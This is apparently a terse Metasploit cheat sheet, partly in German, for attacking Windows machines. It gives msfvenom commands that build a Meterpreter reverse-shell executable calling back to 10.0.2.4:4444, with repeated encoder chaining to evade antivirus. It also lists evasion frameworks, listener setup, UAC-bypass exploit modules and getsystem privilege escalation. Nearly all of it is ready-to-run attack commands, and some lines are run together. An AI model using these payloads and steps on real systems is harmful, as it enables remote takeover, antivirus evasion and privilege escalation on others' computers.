msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.4 \
LPORT=4444 -f exe -o payload.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.4 \
LPORT=4444 -f raw -e x86/shikata_ga_nai -i 10 \
| msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f raw \
| msfvenom -a x86 --platform windows -e x86/shikata_ga_nai \
-i 20 -f exe -o payload.exehttps://github.com/r00t-3xp10it/venom
https://github.com/Veil-Framework/Veil
- Encrypted and embed into code
- Encode with msf
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.0.2.4
set LPORT 4444
set ExitOnSession false
exploit -juse exploit/windows/local/bypassuac_injection
show options
show targets
set target 1 (für x64 Systeme)
set session 1 (in aktive Session setzen)
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.2.4
set lport 4444
exploit
getsystemBypassUAC reload:
use exploit/windows/local/ask (only without AV)
use exploit/windows/fileformat/ms14_064_packager_run_as_admin
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection